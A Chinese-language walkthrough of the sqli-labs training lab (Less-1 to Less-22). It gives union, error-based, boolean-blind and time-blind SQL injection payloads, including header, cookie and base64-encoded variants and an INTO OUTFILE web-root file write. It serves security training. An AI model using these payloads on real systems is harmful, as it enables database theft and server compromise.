标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2024-3174]   作者: 闲云野鸡 发表于: [2022-09-09]

本文共 [227] 位读者顶过

Less1

联合注入

构造payload,查询到基本数据库信息 [出自:jiwo.org]

?id=-1' union select 1,group_concat((select database()),':',(select user()),':',(select version())),3%23

image-20220831190603693

报错注入

查询所有库名,payload如下

?id=1' and extractvalue(1,concat(0x7e,(mid((select group_concat(schema_name) from information_schema.schemata),1,31))))%23
?id=1' and extractvalue(1,concat(0x7e,(mid((select group_concat(schema_name) from information_schema.schemata),32,31))))%23
?id=1' and extractvalue(1,concat(0x7e,(mid((select group_concat(schema_name) from information_schema.schemata),63,31))))%23

image-20220901170533862

202209011705940.png

image-20220901170622005

布尔盲注

payload如下

?id=1' and if(length((select database()))>0,1,0)%23

image-20220902183929994

时间盲注

payload如下

?id=1' and sleep(5)%23

image-20220902183556936

Less-2

联合注入

构造payload,查询到基本数据库信息

?id=-1 union select 1,group_concat((select user()),':',(select database()),':',(select version())),3%23

image-20220831192711633

报错注入

payload如下

?id=1 and extractvalut(1,concat(0x7e,(select database())))%23
?id=-1 and updatexml(1,(concat(0x7e,((select database())))),3)%23

image-20220902185519372

布尔盲注

?id=1 and if(length((select database()))>0,1,0)%23

image-20220902185713215

时间盲注

?id=1 and if(length((select database()))>0,sleep(5),0)%23

image-20220902185948181

Less-3

联合注入

构造payload,查询到基本数据库信息

?id=-1') union select 1,group_concat((select user()),':',(select database()),':',(select version())),3%23

image-20220831194240403

报错注入

?id=-1') and updatexml(1,(concat(0x7e,((select database())))),3)%23
?id=-1') and extractvalue(1,(concat(0x7e,((select database())))))%23

image-20220902190235039

布尔盲注

?id=1') and if(length((select database()))>0,1,0)%23

image-20220902190410675

时间盲注

?id=1') and if(length((select database()))>0,sleep(2),0)%23

image-20220902190441051

Less-4

联合注入

构造payload,查询到基本数据库信息

?id=-1") union select 1,group_concat((select user()),':',(select database()),':',(select version())),3%23

image-20220831195307933

报错注入

?id=1") and updatexml(1,(concat(0x7e,((select database())))),3)%23
?id=1") and extractvalue(1,(concat(0x7e,((select database())))))%23

image-20220902190907658

布尔盲注

?id=1") and if(length((select database()))>0,1,0)%23

image-20220902191017541

时间盲注

?id=1") and if(length((select database()))>0,sleep(2),0)%23

image-20220902191152665

Less-5

报错注入

?id=5' and extractvalue(1,(concat(0x7e,(select database()))))%23
?id=5' and updatexml(1,(concat(0x7e,(select database()))),3)%23

image-20220902191742414

布尔盲注

?id=5' and if(length((select database()))>0,1,0)%23

image-20220902191850882

时间盲注

?id=5' and if(length((select database()))>0,sleep(2),0)%23

image-20220902191915660

Less-6

报错注入

?id=1" and extractvalue(1,(concat(0x7e,(select database()))))%23
?id=1" and updatexml(1,(concat(0x7e,(select database()))),3)%23

image-20220902192152815

布尔盲注

?id=1" and if(length((select database()))>0,1,0)%23

image-20220902192308920

时间盲注

?id=1" and if(length((select database()))>0,sleep(2),0)%23

image-20220902192349525

Less-7

联合查询注入

  • 写webshell,payload如下

?id=1')) INTO OUTFILE '/var/www/html/phpinfo1.php' lines terminated by '<?=phpinfo();?>'%23
?id=1')) INTO OUTFILE '/var/www/html/sqli/Less-7/phpinfo2.php' lines starting by '<?=phpinfo();?>'%23
?id=1')) INTO OUTFILE '/var/www/html/sqli/Less-7/phpinfo4.php' fields terminated by '<?=phpinfo();?>'%23
?id=1')) INTO OUTFILE '/var/www/html/sqli/Less-7/phpinfo4.php' columns terminated by '<?=phpinfo();?>'%23

image-20220902194119691

布尔盲注

?id=1')) and if(length((select database()))>0,1,0)%23

image-20220902195326512

时间盲注

?id=1')) and if(length((select database()))>0,sleep(2),0)%23

image-20220902195405256

Less-8

布尔盲注

利用布尔盲注猜解处数据库,payload如下

?id=1' and if(mid((select database()),1,1)='s',sleep(2),0)%23
?id=1' and if(mid((select database()),2,1)='e',sleep(2),0)%23
?id=1' and if(mid((select database()),3,1)='c',sleep(2),0)%23
?id=1' and if(mid((select database()),4,1)='u',sleep(2),0)%23
?id=1' and if(mid((select database()),5,1)='r',sleep(2),0)%23
?id=1' and if(mid((select database()),6,1)='i',sleep(2),0)%23
?id=1' and if(mid((select database()),7,1)='t',sleep(2),0)%23
?id=1' and if(mid((select database()),8,1)='y',sleep(2),0)%23

image-20220901202344572

最终猜解出来的数据库名为security

时间盲注

?id=1' and if(length((select database()))>0,sleep(5),0)%23

image-20220902200012193

Less-9

时间盲注

?id=1' and if(length((select database()))>0,sleep(5),0)%23

image-20220902200517928

Less-10

时间盲注

?id=1" and if(length((select database()))>0,sleep(5),0)%23

image-20220902200731461

Less-11

联合查询注入

uname=-admin' union select 1,database()%23&passwd=asdf&submit=Submit

image-20220902201231364

报错注入

uname=admin' and extractvalue(1,concat(0x7e,(select database())))%23&passwd=asdf&submit=Submit
uname=admin' and updatexml(1,concat(0x7e,(select database())),3)%23&passwd=asdf&submit=Submit

image-20220902201419445

布尔盲注

uname=admin' and if(length((select database()))>0,1,0)%23&passwd=asdf&submit=Submit

image-20220902201510755

时间盲注

uname=admin' and if(length((select database()))>0,sleep(5),0)%23&passwd=asdf&submit=Submit

image-20220902201554475

Less-12

联合查询注入

uname=-admin") union select 1,database()%23&passwd=asdf&submit=Submit

image-20220902202022433

报错注入

uname=-admin") and extractvalue(1,concat(0x7e,(select database())))%23&passwd=asdf&submit=Submit
uname=-admin") and updatexml(1,concat(0x7e,(select database())),3)%23&passwd=asdf&submit=Submit

image-20220902202127224

布尔盲注

uname=admin") and if(length((select database()))>0,1,0)%23&passwd=asdf&submit=Submit

image-20220902202225502

时间盲注

uname=admin") and if(length((select database()))>0,sleep(3),0)%23&passwd=asdf&submit=Submit

image-20220902202301858

Less-13

报错注入

uname=admin') and extractvalue(1,concat(0x7e,(select database())))%23&passwd=asdgfasdg&submit=Submit
uname=admin') and updatexml(1,concat(0x7e,(select database())),3)%23&passwd=asdgfasdg&submit=Submit

image-20220902202915892

时间盲注

uname=admin') and if(length((select database()))>0,sleep(2),0)%23&passwd=asdgfasdg&submit=Submit

image-20220902203034948

Less-14

报错注入

uname=admin" and extractvalue(1,concat(0x7e,(select database())))%23&passwd=asdfas&submit=Submit
uname=admin" and updatexml(1,concat(0x7e,(select database())),3)%23&passwd=asdfas&submit=Submit

image-20220902203406666

时间盲注

uname=admin" and if(length((select database()))>0,sleep(3),0)%23&passwd=asdfas&submit=Submit

image-20220902203512478

Less-15

时间盲注

uname=admin'+and+if(length((select database()))>0,sleep(3),0)%23&passwd=asdfasdf&submit=Submit

image-20220902204131572

Less-16

时间盲注

uname=admin")+and+if(length((select database()))>0,sleep(3),0)%23&passwd=asdfasdf&submit=Submit

image-20220902204349778

Less-17

报错注入

uname=admin&passwd=asdfas' and extractvalue(1,concat(0x7e,(select database())))%23&submit=Submit
uname=admin&passwd=asdfas' and updatexml(1,concat(0x7e,(select database())),3)%23&submit=Submit

image-20220902205126547

Less-18

User-Agent头注入

header头注入结合报错,payload如下

' and extractvalue(1,concat(0x7e,(select database()))),'
' and updatexml(1,concat(0x7e,(select database())),3),'

image-20220902211411781

Less-19

header头注入(Referer)

' and extractvalue(1,concat(0x7e,(select database()))),'
' and updatexml(1,concat(0x7e,(select database())),3),'

image-20220902211908469

Less-20

联合查询注入

  • cookie注入

uname=-admin' union select 1,database(),3%23

image-20220902213145605

报错注入

  • cookie头注入

uname=admin' and extractvalue(1,concat(0x7e,(select database())))%23
uname=admin' and updatexml(1,concat(0x7e,(select database())),3)%23

image-20220902213256013

布尔盲注

  • cookie头注入

uname=admin' and if(length((select database()))>0,1,0)%23

image-20220902213439386

时间盲注

  • cookie头注入

uname=admin' and if(length((select database()))>0,sleep(3),0)%23

image-20220902213545610

Less-21

联合注入

uname=LWFkbWluJykgdW5pb24gc2VsZWN0IDEsKHNlbGVjdCBkYXRhYmFzZSgpKSwzIw==

image-20220903151859628

header头注入/base64注入(cookie)

  • 报错注入

uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSkpIw==
uname=YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSksMykj

image-20220902214954712

  • 布尔盲注

uname=YWRtaW4nKSBhbmQgaWYobGVuZ3RoKChzZWxlY3QgZGF0YWJhc2UoKSkpPjAsMSwwKSM=

image-20220902215153016

  • 时间盲注

uname=YWRtaW4nKSBhbmQgaWYobGVuZ3RoKChzZWxlY3QgZGF0YWJhc2UoKSkpPjAsc2xlZXAoMyksMCkj

image-20220902215233504

Less-22

联合注入

uname=LWFkbWluIiB1bmlvbiBzZWxlY3QgMSwoc2VsZWN0IGRhdGFiYXNlKCkpLDMj

image-20220903152923010

header头注入/base64(cookie)

  • 报错注入

uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpKSkj
YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpKSwzKSM=

image-20220902215850005

来自FreeBuf.COM

评论

暂无
发表评论
 返回顶部 
热度(227)
 关注微信